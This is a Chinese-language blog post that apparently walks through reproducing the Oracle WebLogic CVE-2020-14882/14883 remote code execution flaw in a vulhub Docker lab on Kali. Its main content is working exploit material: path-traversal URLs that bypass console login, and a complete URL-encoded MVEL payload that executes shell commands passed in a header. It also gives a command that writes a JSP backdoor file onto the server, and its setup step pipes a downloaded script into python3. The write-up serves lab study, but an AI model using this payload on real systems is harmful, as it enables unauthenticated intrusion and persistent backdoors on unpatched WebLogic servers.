一、环境搭建

使用kali系统安装docker,再在docker上安装环境,这里以CVE-2020-14882为例

在kali进入root用户,输入

git clone https://github.com/vulhub/vulhub.gitcd ./vulhub/weblogic/CVE-2020-14882//此命令需要python3环境,详见
​curl -s https://bootstrap.pypa.io/get-pip.py | python3//此命令需要安装docker服务,详见
service docker startpip install docker-composedocker-compose up -d

安装完成后,若能成功访问http://kali-IP:7001/console,即部署完成

二、漏洞复现

1)Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)

漏洞描述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

漏洞影响

Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0

在登陆界面地址栏输入任意一条

http://kali-IP:7001/console/images/%252E%252E%252Fconsole.portalhttp://kali-IP:7001/console/css/%25%32%65%25%32%65%25%32%66console.portal//大写换成小写可绕过http://kali-IP:7001/console/css/%252e%252e%252fconsole.portal

即可绕过检测非法登录到后台

成功登录后,开启burpsuite刷新页面进行抓包,利用reperter模块进行命令输入

运用post提交方式:

/console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt();

创建cmd运行框 或者写入后门文件:cmd:whoami && pwd & echo 'this is a test!' > /u01/oracle/wlserver/server/lib/consoleapp/webapp/images/test.jsp

关于WebLogic环境搭建和漏洞复现相关推荐

  1. DebeCMS环境搭建以及漏洞复现

    文章目录 前言 一.环境搭建   首页访问慢解决方案 二.漏洞分析以及复现   任意修改前台用户密码   cookie伪造任意前台用户登录   前台文件上传漏洞   任意重置后台用户密码   后台任意 ...

  2. php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...

    nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...

  3. weblogic环境搭建

    官方指导文档说明: http://docs.oracle.com/cd/E24329_01/web.1211/e24493/getst.htm#autoId12 配置管理员用户名和口令: 名称:web ...

  4. tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现(CVE20201938)

    漏洞背景 Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer ...

  5. Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker

    Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...

  6. OA-命令执行漏洞复现

    文章目录 0x01介绍 0x02原理 0x03影响版本 0x04环境搭建 0x05漏洞复现 方法一:通过抓包,改包进行利用 方法二:直接利用 免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法 ...

  7. shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理

    文章目录 1. 前置知识 1.1 shiro550利用条件 原理 1.2 shiro721利用条件 原理 shiro-721对cookie中rememberMe的值的解析过程 1.3 基于返回包的sh ...

  8. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

  9. Weblogic历史漏洞复现

    Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...

最新文章

  1. SQL Server数据类型
  2. css权威指南pdf
  3. python项目归纳总结-python商城项目总结
  4. 论文笔记:Triplet Network
  5. 【2013年11月12号】日记
  6. NOIP2018-普及总结
  7. python网格搜索核函数_(转载)Python机器学习笔记GridSearchCV(网格搜索)
  8. 瀑布流布局的实现方式
  9. c语言限流算法,分布式限流常用算法
  10. matlab 颜色对照表
  11. c++获取子类窗口句柄位置_C++中各种获取窗口句柄的方法
  12. jquery版本问题
  13. 程序员必备:那些实用的Chrome扩展程序
  14. java语音识别毕业设计,HMM的语音识别技术的毕业设计
  15. WiFi分析仪在Android9.0上不能用解决方案
  16. 大脑皮层由神经组织构成,大脑神经网络结构图片
  17. 《Adobe Premiere Pro视频编辑指南(第2版)》——水银回放引擎
  18. XTU | 人工智能入门复习总结
  19. Webdw1.0版本已经整合完毕发布到github上了
  20. 使用NVM安装NodeJS并解决npm下载依赖失效问题(最全流程)

热门文章

  1. 济南2021年高考马平烁 成绩 查询,济南18岁女孩高考裸分达704分 从不上辅导班
  2. 剖析特洛伊木马(转)
  3. 110米栏排名:刘翔被梅里特超越 让出榜首位置
  4. VS配置使用NUnits
  5. 布莱顿大学有计算机游戏研究生或者动画研究生么,布莱顿大学研究生学费
  6. ZOJ3734 LIKE vs CANDLE
  7. Unboxing造成的NullPointerException
  8. [实体关系抽取]TPLinker: Single-stage Joint Extraction of Entities and Relations Through Token Pair Link
  9. MITSUMI美上美(SIQ-02FVC3)拨盘编码器硬件连接及stm32f103zet6正交解码测试
  10. 【仙女踩坑实录】Ubuntu20.04系统设置打开后闪退